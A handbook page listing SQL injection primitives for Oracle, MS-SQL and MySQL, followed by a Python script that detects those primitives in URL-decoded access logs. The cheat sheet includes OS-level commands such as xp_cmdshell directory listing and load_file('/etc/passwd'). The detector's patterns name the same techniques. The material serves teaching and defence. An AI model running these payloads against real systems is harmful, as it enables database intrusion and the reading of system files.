The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws
Chapter 9  Injecting Code  289
70779c09.qxd:WileyRed  9/14/07  3:13 PM  Page 289




SQL Syntax

Requirement: ASCII and SUBSTRING
  Oracle:  ASCII('A') is equal to 65
           SUBSTR('ABCDE',2,3) is equal to BCD
  MS-SQL:  ASCII('A') is equal to 65
           SUBSTRING('ABCDE',2,3) is equal to BCD
  MySQL:   ASCII('A') is equal to 65
           SUBSTRING('ABCDE',2,3) is equal to BCD

Requirement: Retrieve current database user
  Oracle:  Select Sys.login_user from dual
           SELECT user FROM dual
           SYS_CONTEXT('USERENV','SESSION_USER')
  MS-SQL:  select user
           select suser_sname()
  MySQL:   SELECT user()

Requirement: Cause a time delay
  Oracle:  Utl_Http.request('http://madeupserver.com')
  MS-SQL:  waitfor delay '0:0:10'
           exec master..xp_cmdshell 'ping localhost'
  MySQL:   benchmark(50000,sha1('test'))

Requirement: Retrieve database version string
  Oracle:  select banner from v$version
  MS-SQL:  select @@version
  MySQL:   select @@version

Requirement: Retrieve current database
  Oracle:  SYS_CONTEXT('USERENV','DB_NAME')
  MS-SQL:  select db_name()
           The server name can be retrieved using: select @@servername
  MySQL:   Select database()






Requirement: Retrieve current user's privilege
  Oracle:  select * from session_privs
  MS-SQL:  select grantee, table_name, privilege_type
           from INFORMATION_SCHEMA.TABLE_PRIVILEGES
  MySQL:   SHOW GRANTS FOR CURRENT_USER()

Requirement: Show user objects
  Oracle:  Select object_name, object_type from user_objects
  MS-SQL:  SELECT * FROM sysobjects
  MySQL:   (There is no database metadata in MySQL.)

Requirement: Show user tables
  Oracle:  Select object_name, object_type from user_objects
           WHERE object_type='TABLE'
           Or, to show all tables to which the user has access:
           SELECT table_name FROM all_tables
  MS-SQL:  SELECT * FROM sysobjects WHERE xtype='U'
  MySQL:   (There is no database metadata in MySQL.)

Requirement: Show column names for table foo
  Oracle:  Select column_name from user_tab_columns
           where table_name = 'FOO'
           Use the ALL_TAB_COLUMNS table if the target data is not
           owned by the current application user.
  MS-SQL:  SELECT syscolumns.* FROM syscolumns JOIN
           sysobjects ON syscolumns.id=sysobjects.id
           WHERE sysobjects.name='FOO'
  MySQL:   show columns from foo

Requirement: Interact with the operating system (simplest ways)
  Oracle:  See The Oracle Hacker's Handbook, by David Litchfield
  MS-SQL:  exec xp_cmdshell 'dir c:\'
  MySQL:   select load_file('/etc/passwd')
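
The primitives in this table are also what a defender should look for in traffic and query logs. The following Python detector is an added example, not code from the book: it URL-decodes web-server access-log lines and reports which DBMS-specific primitive from the table appears, so a triage script can tell an Oracle probe from an MS-SQL or MySQL one. The log format, the `id` parameter and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the cheat sheet above: each pairs a DBMS-specific
# primitive with the platform it fingerprints and the technique it serves.
SIGNATURES = [
    ("Oracle",  "time delay",      r"utl_http\.request\s*\("),
    ("Oracle",  "version string",  r"from\s+v\$version\b"),
    ("Oracle",  "metadata",        r"\b(session_privs|user_objects|all_tables|user_tab_columns|all_tab_columns)\b"),
    ("Oracle",  "current user/db", r"sys_context\s*\(\s*'userenv'"),
    ("MS-SQL",  "time delay",      r"\bwaitfor\s+delay\b"),
    ("MS-SQL",  "OS interaction",  r"\bxp_cmdshell\b"),
    ("MS-SQL",  "metadata",        r"\b(sysobjects|syscolumns|information_schema\.table_privileges)\b"),
    ("MS-SQL",  "current user/db", r"\b(suser_sname|db_name)\s*\(|@@servername\b"),
    ("MySQL",   "time delay",      r"\bbenchmark\s*\("),
    ("MySQL",   "OS interaction",  r"\bload_file\s*\("),
    ("MySQL",   "metadata",        r"\bshow\s+(grants|columns)\b"),
    ("MySQL",   "current user/db", r"\b(database|user)\s*\(\s*\)"),
    ("generic", "version string",  r"@@version\b"),
    ("generic", "char extraction", r"\b(ascii|substr|substring)\s*\("),
]
COMPILED = [(db, kind, re.compile(p, re.IGNORECASE)) for db, kind, p in SIGNATURES]

def classify(line):
    """Return (dbms, technique) pairs found in one log line, after URL-decoding it."""
    decoded = unquote_plus(line)
    return [(db, kind) for db, kind, rx in COMPILED if rx.search(decoded)]

def scan(lines):
    """Map 1-based line number -> hits, for lines that have at least one hit."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits

# Constructed sample access-log lines (not real traffic); the parameter values
# are the cheat-sheet strings above, URL-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2022:10:00:01] "GET /item?id=5 HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Jan/2022:10:00:02] "GET /item?id=waitfor+delay+%270:0:10%27 HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Jan/2022:10:00:03] "GET /item?id=select+banner+from+v%24version HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2022:10:00:04] "GET /item?id=benchmark(50000,sha1(%27test%27)) HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Jan/2022:10:00:05] "GET /item?id=SYS_CONTEXT(%27USERENV%27,%27DB_NAME%27) HTTP/1.1" 200 812',
]
if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

Signatures are matched after decoding, so `%27` quotes and `+` spaces do not evade them; `CURRENT_USER()` is deliberately not matched by the `user()` pattern because the word boundary sits before `CURRENT`.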
